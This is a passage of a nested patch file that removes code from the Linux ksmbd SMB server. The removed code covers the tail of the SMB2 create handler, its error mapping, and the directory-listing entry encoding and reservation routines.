+-						       rc);
+-				}
+-			}
+-		}
+-		rc = 0;
+-	}
+-
+-	if (stream_name) {
+-		rc = smb2_set_stream_name_xattr(&path,
+-						fp,
+-						stream_name,
+-						s_type);
+-		if (rc)
+-			goto err_out;
+-		file_info = FILE_CREATED;
+-	}
+-
+-	fp->attrib_only = !(req->DesiredAccess & ~(FILE_READ_ATTRIBUTES_LE |
+-			FILE_WRITE_ATTRIBUTES_LE | FILE_SYNCHRONIZE_LE));
+-	if (!S_ISDIR(file_inode(filp)->i_mode) && open_flags & O_TRUNC &&
+-	    !fp->attrib_only && !stream_name) {
+-		smb_break_all_oplock(work, fp);
+-		need_truncate = 1;
+-	}
+-
+-	/* fp should be searchable through ksmbd_inode.m_fp_list
+-	 * after daccess, saccess, attrib_only, and stream are
+-	 * initialized.
+-	 */
+-	write_lock(&fp->f_ci->m_lock);
+-	list_add(&fp->node, &fp->f_ci->m_fp_list);
+-	write_unlock(&fp->f_ci->m_lock);
+-
+-	/* Check delete pending among previous fp before oplock break */
+-	if (ksmbd_inode_pending_delete(fp)) {
+-		rc = -EBUSY;
+-		goto err_out;
+-	}
+-
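+-	/*
+-	 * Check share-mode conflicts first. Without oplock support on
+-	 * the share (or leasing capability for a lease request), a
+-	 * conflict on a regular file fails the open; otherwise the
+-	 * conflict is handled by the oplock/lease grant below.
+-	 */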
+-	share_ret = ksmbd_smb_check_shared_mode(fp->filp, fp);
+-	if (!test_share_config_flag(work->tcon->share_conf, KSMBD_SHARE_FLAG_OPLOCKS) ||
+-	    (req_op_level == SMB2_OPLOCK_LEVEL_LEASE &&
+-	     !(conn->vals->capabilities & SMB2_GLOBAL_CAP_LEASING))) {
+-		if (share_ret < 0 && !S_ISDIR(file_inode(fp->filp)->i_mode)) {
+-			rc = share_ret;
+-			goto err_out;
+-		}
+-	} else {
+-		if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE) {
+-			req_op_level = smb2_map_lease_to_oplock(lc->req_state);
+-			ksmbd_debug(SMB,
+-				    "lease req for(%s) req oplock state 0x%x, lease state 0x%x\n",
+-				    name, req_op_level, lc->req_state);
+-			rc = find_same_lease_key(sess, fp->f_ci, lc);
+-			if (rc)
+-				goto err_out;
+-		} else if (open_flags == O_RDONLY &&
+-			   (req_op_level == SMB2_OPLOCK_LEVEL_BATCH ||
+-			    req_op_level == SMB2_OPLOCK_LEVEL_EXCLUSIVE))
+-			req_op_level = SMB2_OPLOCK_LEVEL_II;
+-
+-		rc = smb_grant_oplock(work, req_op_level,
+-				      fp->persistent_id, fp,
+-				      le32_to_cpu(req->hdr.Id.SyncId.TreeId),
+-				      lc, share_ret);
+-		if (rc < 0)
+-			goto err_out;
+-	}
+-
+-	if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)
+-		ksmbd_fd_set_delete_on_close(fp, file_info);
+-
+-	if (need_truncate) {
+-		rc = smb2_create_truncate(&path);
+-		if (rc)
+-			goto err_out;
+-	}
+-
+-	if (req->CreateContextsOffset) {
+-		struct create_alloc_size_req *az_req;
+-
+-		az_req = (struct create_alloc_size_req *)smb2_find_context_vals(req,
+-					SMB2_CREATE_ALLOCATION_SIZE, 4);
+-		if (IS_ERR(az_req)) {
+-			rc = PTR_ERR(az_req);
+-			goto err_out;
+-		} else if (az_req) {
+-			loff_t alloc_size;
+-			int err;
+-
+-			if (le16_to_cpu(az_req->ccontext.DataOffset) +
+-			    le32_to_cpu(az_req->ccontext.DataLength) <
+-			    sizeof(struct create_alloc_size_req)) {
+-				rc = -EINVAL;
+-				goto err_out;
+-			}
+-			alloc_size = le64_to_cpu(az_req->AllocationSize);
+-			ksmbd_debug(SMB,
+-				    "request smb2 create allocate size : %llu\n",
+-				    alloc_size);
+-			smb_break_all_levII_oplock(work, fp, 1);
+-			err = vfs_fallocate(fp->filp, FALLOC_FL_KEEP_SIZE, 0,
+-					    alloc_size);
+-			if (err < 0)
+-				ksmbd_debug(SMB,
+-					    "vfs_fallocate is failed : %d\n",
+-					    err);
+-		}
+-
+-		context = smb2_find_context_vals(req, SMB2_CREATE_QUERY_ON_DISK_ID, 4);
+-		if (IS_ERR(context)) {
+-			rc = PTR_ERR(context);
+-			goto err_out;
+-		} else if (context) {
+-			ksmbd_debug(SMB, "get query on disk id context\n");
+-			query_disk_id = 1;
+-		}
+-	}
+-
+-	rc = ksmbd_vfs_getattr(&path, &stat);
+-	if (rc)
+-		goto err_out;
+-
+-	if (stat.result_mask & STATX_BTIME)
+-		fp->create_time = ksmbd_UnixTimeToNT(stat.btime);
+-	else
+-		fp->create_time = ksmbd_UnixTimeToNT(stat.ctime);
+-	if (req->FileAttributes || fp->f_ci->m_fattr == 0)
+-		fp->f_ci->m_fattr =
+-			cpu_to_le32(smb2_get_dos_mode(&stat, le32_to_cpu(req->FileAttributes)));
+-
+-	if (!created)
+-		smb2_update_xattrs(tcon, &path, fp);
+-	else
+-		smb2_new_xattrs(tcon, &path, fp);
+-
+-	memcpy(fp->client_guid, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
+-
+-	rsp->StructureSize = cpu_to_le16(89);
+-	rcu_read_lock();
+-	opinfo = rcu_dereference(fp->f_opinfo);
+-	rsp->OplockLevel = opinfo != NULL ? opinfo->level : 0;
+-	rcu_read_unlock();
+-	rsp->Flags = 0;
+-	rsp->CreateAction = cpu_to_le32(file_info);
+-	rsp->CreationTime = cpu_to_le64(fp->create_time);
+-	time = ksmbd_UnixTimeToNT(stat.atime);
+-	rsp->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.mtime);
+-	rsp->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.ctime);
+-	rsp->ChangeTime = cpu_to_le64(time);
+-	rsp->AllocationSize = S_ISDIR(stat.mode) ? 0 :
+-		cpu_to_le64(stat.blocks << 9);
+-	rsp->EndofFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+-	rsp->FileAttributes = fp->f_ci->m_fattr;
+-
+-	rsp->Reserved2 = 0;
+-
+-	rsp->PersistentFileId = fp->persistent_id;
+-	rsp->VolatileFileId = fp->volatile_id;
+-
+-	rsp->CreateContextsOffset = 0;
+-	rsp->CreateContextsLength = 0;
+-	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1 */
+-
+-	/* If a lease was requested, send a lease context response */
+-	if (opinfo && opinfo->is_lease) {
+-		struct create_context *lease_ccontext;
+-
+-		ksmbd_debug(SMB, "lease granted on(%s) lease state 0x%x\n",
+-			    name, opinfo->o_lease->state);
+-		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_LEASE;
+-
+-		lease_ccontext = (struct create_context *)rsp->Buffer;
+-		contxt_cnt++;
+-		create_lease_buf(rsp->Buffer, opinfo->o_lease);
+-		le32_add_cpu(&rsp->CreateContextsLength,
+-			     conn->vals->create_lease_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_lease_size);
+-		next_ptr = &lease_ccontext->Next;
+-		next_off = conn->vals->create_lease_size;
+-	}
+-
+-	if (maximal_access_ctxt) {
+-		struct create_context *mxac_ccontext;
+-
+-		if (maximal_access == 0)
+-			ksmbd_vfs_query_maximal_access(user_ns,
+-						       path.dentry,
+-						       &maximal_access);
+-		mxac_ccontext = (struct create_context *)(rsp->Buffer +
+-				le32_to_cpu(rsp->CreateContextsLength));
+-		contxt_cnt++;
+-		create_mxac_rsp_buf(rsp->Buffer +
+-				le32_to_cpu(rsp->CreateContextsLength),
+-				le32_to_cpu(maximal_access));
+-		le32_add_cpu(&rsp->CreateContextsLength,
+-			     conn->vals->create_mxac_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_mxac_size);
+-		if (next_ptr)
+-			*next_ptr = cpu_to_le32(next_off);
+-		next_ptr = &mxac_ccontext->Next;
+-		next_off = conn->vals->create_mxac_size;
+-	}
+-
+-	if (query_disk_id) {
+-		struct create_context *disk_id_ccontext;
+-
+-		disk_id_ccontext = (struct create_context *)(rsp->Buffer +
+-				le32_to_cpu(rsp->CreateContextsLength));
+-		contxt_cnt++;
+-		create_disk_id_rsp_buf(rsp->Buffer +
+-				le32_to_cpu(rsp->CreateContextsLength),
+-				stat.ino, tcon->id);
+-		le32_add_cpu(&rsp->CreateContextsLength,
+-			     conn->vals->create_disk_id_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_disk_id_size);
+-		if (next_ptr)
+-			*next_ptr = cpu_to_le32(next_off);
+-		next_ptr = &disk_id_ccontext->Next;
+-		next_off = conn->vals->create_disk_id_size;
+-	}
+-
+-	if (posix_ctxt) {
+-		contxt_cnt++;
+-		create_posix_rsp_buf(rsp->Buffer +
+-				le32_to_cpu(rsp->CreateContextsLength),
+-				fp);
+-		le32_add_cpu(&rsp->CreateContextsLength,
+-			     conn->vals->create_posix_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_posix_size);
+-		if (next_ptr)
+-			*next_ptr = cpu_to_le32(next_off);
+-	}
+-
+-	if (contxt_cnt > 0) {
+-		rsp->CreateContextsOffset =
+-			cpu_to_le32(offsetof(struct smb2_create_rsp, Buffer));
+-	}
+-
+-err_out:
+-	if (file_present || created)
+-		path_put(&path);
+-	ksmbd_revert_fsids(work);
+-err_out1:
+-	if (rc) {
+-		if (rc == -EINVAL)
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		else if (rc == -EOPNOTSUPP)
+-			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-		else if (rc == -EACCES || rc == -ESTALE || rc == -EXDEV)
+-			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		else if (rc == -ENOENT)
+-			rsp->hdr.Status = STATUS_OBJECT_NAME_INVALID;
+-		else if (rc == -EPERM)
+-			rsp->hdr.Status = STATUS_SHARING_VIOLATION;
+-		else if (rc == -EBUSY)
+-			rsp->hdr.Status = STATUS_DELETE_PENDING;
+-		else if (rc == -EBADF)
+-			rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
+-		else if (rc == -ENOEXEC)
+-			rsp->hdr.Status = STATUS_DUPLICATE_OBJECTID;
+-		else if (rc == -ENXIO)
+-			rsp->hdr.Status = STATUS_NO_SUCH_DEVICE;
+-		else if (rc == -EEXIST)
+-			rsp->hdr.Status = STATUS_OBJECT_NAME_COLLISION;
+-		else if (rc == -EMFILE)
+-			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
+-		if (!rsp->hdr.Status)
+-			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
+-
+-		if (fp)
+-			ksmbd_fd_put(work, fp);
+-		smb2_set_err_rsp(work);
+-		ksmbd_debug(SMB, "Error response: %x\n", rsp->hdr.Status);
+-	}
+-
+-	kfree(name);
+-	kfree(lc);
+-
+-	return 0;
+-}
+-
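+-/**
+- * readdir_info_level_struct_sz() - get struct size for an info level
+- * @info_level:	smb information level
+- *
+- * Return:	size of the corresponding directory entry structure,
+- *		otherwise -EOPNOTSUPP
+- */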
+-static int readdir_info_level_struct_sz(int info_level)
+-{
+-	switch (info_level) {
+-	case FILE_FULL_DIRECTORY_INFORMATION:
+-		return sizeof(struct file_full_directory_info);
+-	case FILE_BOTH_DIRECTORY_INFORMATION:
+-		return sizeof(struct file_both_directory_info);
+-	case FILE_DIRECTORY_INFORMATION:
+-		return sizeof(struct file_directory_info);
+-	case FILE_NAMES_INFORMATION:
+-		return sizeof(struct file_names_info);
+-	case FILEID_FULL_DIRECTORY_INFORMATION:
+-		return sizeof(struct file_id_full_dir_info);
+-	case FILEID_BOTH_DIRECTORY_INFORMATION:
+-		return sizeof(struct file_id_both_directory_info);
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		return sizeof(struct smb2_posix_info);
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-}
+-
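+-/**
+- * dentry_name() - pull the next entry name out of the readdir buffer
+- * @d_info:	structure holding the variables for query dir
+- * @info_level:	smb information level
+- *
+- * Advances d_info->rptr past the current entry and points d_info->name
+- * and d_info->name_len at its file name.
+- *
+- * Return:	0 on success, otherwise -EINVAL
+- */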
+-static int dentry_name(struct ksmbd_dir_info *d_info, int info_level)
+-{
+-	switch (info_level) {
+-	case FILE_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_full_directory_info *ffdinfo;
+-
+-		ffdinfo = (struct file_full_directory_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(ffdinfo->NextEntryOffset);
+-		d_info->name = ffdinfo->FileName;
+-		d_info->name_len = le32_to_cpu(ffdinfo->FileNameLength);
+-		return 0;
+-	}
+-	case FILE_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_both_directory_info *fbdinfo;
+-
+-		fbdinfo = (struct file_both_directory_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(fbdinfo->NextEntryOffset);
+-		d_info->name = fbdinfo->FileName;
+-		d_info->name_len = le32_to_cpu(fbdinfo->FileNameLength);
+-		return 0;
+-	}
+-	case FILE_DIRECTORY_INFORMATION:
+-	{
+-		struct file_directory_info *fdinfo;
+-
+-		fdinfo = (struct file_directory_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(fdinfo->NextEntryOffset);
+-		d_info->name = fdinfo->FileName;
+-		d_info->name_len = le32_to_cpu(fdinfo->FileNameLength);
+-		return 0;
+-	}
+-	case FILE_NAMES_INFORMATION:
+-	{
+-		struct file_names_info *fninfo;
+-
+-		fninfo = (struct file_names_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(fninfo->NextEntryOffset);
+-		d_info->name = fninfo->FileName;
+-		d_info->name_len = le32_to_cpu(fninfo->FileNameLength);
+-		return 0;
+-	}
+-	case FILEID_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_full_dir_info *dinfo;
+-
+-		dinfo = (struct file_id_full_dir_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(dinfo->NextEntryOffset);
+-		d_info->name = dinfo->FileName;
+-		d_info->name_len = le32_to_cpu(dinfo->FileNameLength);
+-		return 0;
+-	}
+-	case FILEID_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_both_directory_info *fibdinfo;
+-
+-		fibdinfo = (struct file_id_both_directory_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(fibdinfo->NextEntryOffset);
+-		d_info->name = fibdinfo->FileName;
+-		d_info->name_len = le32_to_cpu(fibdinfo->FileNameLength);
+-		return 0;
+-	}
+-	case SMB_FIND_FILE_POSIX_INFO:
+-	{
+-		struct smb2_posix_info *posix_info;
+-
+-		posix_info = (struct smb2_posix_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(posix_info->NextEntryOffset);
+-		d_info->name = posix_info->name;
+-		d_info->name_len = le32_to_cpu(posix_info->name_len);
+-		return 0;
+-	}
+-	default:
+-		return -EINVAL;
+-	}
+-}
+-
+-/**
+- * smb2_populate_readdir_entry() - encode directory entry in smb2 response
+- * buffer
+- * @conn:	connection instance
+- * @info_level:	smb information level
+- * @d_info:	structure holding the variables for query dir
+- * @ksmbd_kstat:	ksmbd wrapper of dirent stat information
+- *
+- * If the directory has many entries, a single find first request cannot
+- * read them all; find next may be called multiple times to read the
+- * remaining dir entries.
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int smb2_populate_readdir_entry(struct ksmbd_conn *conn, int info_level,
+-				       struct ksmbd_dir_info *d_info,
+-				       struct ksmbd_kstat *ksmbd_kstat)
+-{
+-	int next_entry_offset = 0;
+-	char *conv_name;
+-	int conv_len;
+-	void *kstat;
+-	int struct_sz, rc = 0;
+-
+-	conv_name = ksmbd_convert_dir_info_name(d_info,
+-						conn->local_nls,
+-						&conv_len);
+-	if (!conv_name)
+-		return -ENOMEM;
+-
+-	/* Somehow the name has only terminating NULL bytes */
+-	if (conv_len < 0) {
+-		rc = -EINVAL;
+-		goto free_conv_name;
+-	}
+-
+-	struct_sz = readdir_info_level_struct_sz(info_level) - 1 + conv_len;
+-	next_entry_offset = ALIGN(struct_sz, KSMBD_DIR_INFO_ALIGNMENT);
+-	d_info->last_entry_off_align = next_entry_offset - struct_sz;
+-
+-	if (next_entry_offset > d_info->out_buf_len) {
+-		d_info->out_buf_len = 0;
+-		rc = -ENOSPC;
+-		goto free_conv_name;
+-	}
+-
+-	kstat = d_info->wptr;
+-	if (info_level != FILE_NAMES_INFORMATION)
+-		kstat = ksmbd_vfs_init_kstat(&d_info->wptr, ksmbd_kstat);
+-
+-	switch (info_level) {
+-	case FILE_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_full_directory_info *ffdinfo;
+-
+-		ffdinfo = (struct file_full_directory_info *)kstat;
+-		ffdinfo->FileNameLength = cpu_to_le32(conv_len);
+-		ffdinfo->EaSize =
+-			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
+-		if (ffdinfo->EaSize)
+-			ffdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			ffdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		memcpy(ffdinfo->FileName, conv_name, conv_len);
+-		ffdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_both_directory_info *fbdinfo;
+-
+-		fbdinfo = (struct file_both_directory_info *)kstat;
+-		fbdinfo->FileNameLength = cpu_to_le32(conv_len);
+-		fbdinfo->EaSize =
+-			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
+-		if (fbdinfo->EaSize)
+-			fbdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
+-		fbdinfo->ShortNameLength = 0;
+-		fbdinfo->Reserved = 0;
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			fbdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		memcpy(fbdinfo->FileName, conv_name, conv_len);
+-		fbdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_DIRECTORY_INFORMATION:
+-	{
+-		struct file_directory_info *fdinfo;
+-
+-		fdinfo = (struct file_directory_info *)kstat;
+-		fdinfo->FileNameLength = cpu_to_le32(conv_len);
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			fdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		memcpy(fdinfo->FileName, conv_name, conv_len);
+-		fdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_NAMES_INFORMATION:
+-	{
+-		struct file_names_info *fninfo;
+-
+-		fninfo = (struct file_names_info *)kstat;
+-		fninfo->FileNameLength = cpu_to_le32(conv_len);
+-		memcpy(fninfo->FileName, conv_name, conv_len);
+-		fninfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILEID_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_full_dir_info *dinfo;
+-
+-		dinfo = (struct file_id_full_dir_info *)kstat;
+-		dinfo->FileNameLength = cpu_to_le32(conv_len);
+-		dinfo->EaSize =
+-			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
+-		if (dinfo->EaSize)
+-			dinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
+-		dinfo->Reserved = 0;
+-		dinfo->UniqueId = cpu_to_le64(ksmbd_kstat->kstat->ino);
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			dinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		memcpy(dinfo->FileName, conv_name, conv_len);
+-		dinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILEID_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_both_directory_info *fibdinfo;
+-
+-		fibdinfo = (struct file_id_both_directory_info *)kstat;
+-		fibdinfo->FileNameLength = cpu_to_le32(conv_len);
+-		fibdinfo->EaSize =
+-			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
+-		if (fibdinfo->EaSize)
+-			fibdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
+-		fibdinfo->UniqueId = cpu_to_le64(ksmbd_kstat->kstat->ino);
+-		fibdinfo->ShortNameLength = 0;
+-		fibdinfo->Reserved = 0;
+-		fibdinfo->Reserved2 = cpu_to_le16(0);
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			fibdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		memcpy(fibdinfo->FileName, conv_name, conv_len);
+-		fibdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case SMB_FIND_FILE_POSIX_INFO:
+-	{
+-		struct smb2_posix_info *posix_info;
+-		u64 time;
+-
+-		posix_info = (struct smb2_posix_info *)kstat;
+-		posix_info->Ignored = 0;
+-		posix_info->CreationTime = cpu_to_le64(ksmbd_kstat->create_time);
+-		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->ctime);
+-		posix_info->ChangeTime = cpu_to_le64(time);
+-		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->atime);
+-		posix_info->LastAccessTime = cpu_to_le64(time);
+-		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->mtime);
+-		posix_info->LastWriteTime = cpu_to_le64(time);
+-		posix_info->EndOfFile = cpu_to_le64(ksmbd_kstat->kstat->size);
+-		posix_info->AllocationSize = cpu_to_le64(ksmbd_kstat->kstat->blocks << 9);
+-		posix_info->DeviceId = cpu_to_le32(ksmbd_kstat->kstat->rdev);
+-		posix_info->HardLinks = cpu_to_le32(ksmbd_kstat->kstat->nlink);
+-		posix_info->Mode = cpu_to_le32(ksmbd_kstat->kstat->mode & 0777);
+-		posix_info->Inode = cpu_to_le64(ksmbd_kstat->kstat->ino);
+-		posix_info->DosAttributes =
+-			S_ISDIR(ksmbd_kstat->kstat->mode) ?
+-				FILE_ATTRIBUTE_DIRECTORY_LE : FILE_ATTRIBUTE_ARCHIVE_LE;
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			posix_info->DosAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		/*
+-		 * SidBuffer(32) contains two sids (UNIX user sid(16), UNIX group sid(16)).
+-		 * UNIX sid(16) = revision(1) + num_subauth(1) + authority(6) +
+-		 *		  sub_auth(4 * 1(num_subauth)) + RID(4).
+-		 */
+-		id_to_sid(from_kuid_munged(&init_user_ns, ksmbd_kstat->kstat->uid),
+-			  SIDUNIX_USER, (struct smb_sid *)&posix_info->SidBuffer[0]);
+-		id_to_sid(from_kgid_munged(&init_user_ns, ksmbd_kstat->kstat->gid),
+-			  SIDUNIX_GROUP, (struct smb_sid *)&posix_info->SidBuffer[16]);
+-		memcpy(posix_info->name, conv_name, conv_len);
+-		posix_info->name_len = cpu_to_le32(conv_len);
+-		posix_info->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-
+-	} /* switch (info_level) */
+-
+-	d_info->last_entry_offset = d_info->data_count;
+-	d_info->data_count += next_entry_offset;
+-	d_info->out_buf_len -= next_entry_offset;
+-	d_info->wptr += next_entry_offset;
+-
+-	ksmbd_debug(SMB,
+-		    "info_level : %d, buf_len :%d, next_offset : %d, data_count : %d\n",
+-		    info_level, d_info->out_buf_len,
+-		    next_entry_offset, d_info->data_count);
+-
+-free_conv_name:
+-	kfree(conv_name);
+-	return rc;
+-}
+-
+-struct smb2_query_dir_private {
+-	struct ksmbd_work	*work;
+-	char			*search_pattern;
+-	struct ksmbd_file	*dir_fp;
+-
+-	struct ksmbd_dir_info	*d_info;
+-	int			info_level;
+-};
+-
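+-/*
+- * lock_dir()/unlock_dir() serialize lookup_one() against concurrent
+- * modifications of the directory.
+- */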
+-static void lock_dir(struct ksmbd_file *dir_fp)
+-{
+-	struct dentry *dir = dir_fp->filp->f_path.dentry;
+-
+-	inode_lock_nested(d_inode(dir), I_MUTEX_PARENT);
+-}
+-
+-static void unlock_dir(struct ksmbd_file *dir_fp)
+-{
+-	struct dentry *dir = dir_fp->filp->f_path.dentry;
+-
+-	inode_unlock(d_inode(dir));
+-}
+-
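+-/**
+- * process_query_dir_entries() - encode the reserved directory entries
+- * @priv:	query dir private data
+- *
+- * Looks up every name reserved in the readdir buffer, fills in its
+- * attributes and encodes the final response entry via
+- * smb2_populate_readdir_entry().
+- *
+- * Return:	0 on success, otherwise error
+- */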
+-static int process_query_dir_entries(struct smb2_query_dir_private *priv)
+-{
+-	struct user_namespace	*user_ns = file_mnt_user_ns(priv->dir_fp->filp);
+-	struct kstat		kstat;
+-	struct ksmbd_kstat	ksmbd_kstat;
+-	int			rc;
+-	int			i;
+-
+-	for (i = 0; i < priv->d_info->num_entry; i++) {
+-		struct dentry *dent;
+-
+-		if (dentry_name(priv->d_info, priv->info_level))
+-			return -EINVAL;
+-
+-		lock_dir(priv->dir_fp);
+-		dent = lookup_one(user_ns, priv->d_info->name,
+-				  priv->dir_fp->filp->f_path.dentry,
+-				  priv->d_info->name_len);
+-		unlock_dir(priv->dir_fp);
+-
+-		if (IS_ERR(dent)) {
+-			ksmbd_debug(SMB, "Cannot lookup `%s' [%ld]\n",
+-				    priv->d_info->name,
+-				    PTR_ERR(dent));
+-			continue;
+-		}
+-		if (unlikely(d_is_negative(dent))) {
+-			dput(dent);
+-			ksmbd_debug(SMB, "Negative dentry `%s'\n",
+-				    priv->d_info->name);
+-			continue;
+-		}
+-
+-		ksmbd_kstat.kstat = &kstat;
+-		if (priv->info_level != FILE_NAMES_INFORMATION)
+-			ksmbd_vfs_fill_dentry_attrs(priv->work,
+-						    user_ns,
+-						    dent,
+-						    &ksmbd_kstat);
+-
+-		rc = smb2_populate_readdir_entry(priv->work->conn,
+-						 priv->info_level,
+-						 priv->d_info,
+-						 &ksmbd_kstat);
+-		dput(dent);
+-		if (rc)
+-			return rc;
+-	}
+-	return 0;
+-}
+-
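+-/**
+- * reserve_populate_dentry() - reserve a response entry for a dir entry
+- * @d_info:	structure holding the variables for query dir
+- * @info_level:	smb information level
+- *
+- * Only the file name is written here; the remaining attributes are
+- * filled in later by process_query_dir_entries().
+- *
+- * Return:	0 on success, -ENOSPC if the output buffer is full,
+- *		-EOPNOTSUPP for an unknown info level
+- */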
+-static int reserve_populate_dentry(struct ksmbd_dir_info *d_info,
+-				   int info_level)
+-{
+-	int struct_sz;
+-	int conv_len;
+-	int next_entry_offset;
+-
+-	struct_sz = readdir_info_level_struct_sz(info_level);
+-	if (struct_sz == -EOPNOTSUPP)
+-		return -EOPNOTSUPP;
+-
+-	conv_len = (d_info->name_len + 1) * 2;
+-	next_entry_offset = ALIGN(struct_sz - 1 + conv_len,
+-				  KSMBD_DIR_INFO_ALIGNMENT);
+-
+-	if (next_entry_offset > d_info->out_buf_len) {
+-		d_info->out_buf_len = 0;
+-		return -ENOSPC;
+-	}
+-
+-	switch (info_level) {
+-	case FILE_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_full_directory_info *ffdinfo;
+-
+-		ffdinfo = (struct file_full_directory_info *)d_info->wptr;
+-		memcpy(ffdinfo->FileName, d_info->name, d_info->name_len);
+-		ffdinfo->FileName[d_info->name_len] = 0x00;
+-		ffdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		ffdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_both_directory_info *fbdinfo;
+-
+-		fbdinfo = (struct file_both_directory_info *)d_info->wptr;
+-		memcpy(fbdinfo->FileName, d_info->name, d_info->name_len);
+-		fbdinfo->FileName[d_info->name_len] = 0x00;
+-		fbdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		fbdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_DIRECTORY_INFORMATION:
+-	{
+-		struct file_directory_info *fdinfo;
+-
+-		fdinfo = (struct file_directory_info *)d_info->wptr;
+-		memcpy(fdinfo->FileName, d_info->name, d_info->name_len);
+-		fdinfo->FileName[d_info->name_len] = 0x00;
+-		fdinfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		fdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_NAMES_INFORMATION:
+-	{
+-		struct file_names_info *fninfo;
+-
+-		fninfo = (struct file_names_info *)d_info->wptr;
+-		memcpy(fninfo->FileName, d_info->name, d_info->name_len);
+-		fninfo->FileName[d_info->name_len] = 0x00;
+-		fninfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		fninfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILEID_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_full_dir_info *dinfo;
+-
+-		dinfo = (struct file_id_full_dir_info *)d_info->wptr;
+-		memcpy(dinfo->FileName, d_info->name, d_info->name_len);
+-		dinfo->FileName[d_info->name_len] = 0x00;
+-		dinfo->FileNameLength = cpu_to_le32(d_info->name_len);
+-		dinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILEID_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_both_directory_info *fibdinfo;
+-
+-		fibdinfo = (struct file_id_both_directory_info *)d_info->wptr;
+-		memcpy(fibdinfo->FileName, d_info->name, d_info->name_len);
+-		fibdinfo->FileName[d_info->name_len] = 0x00;
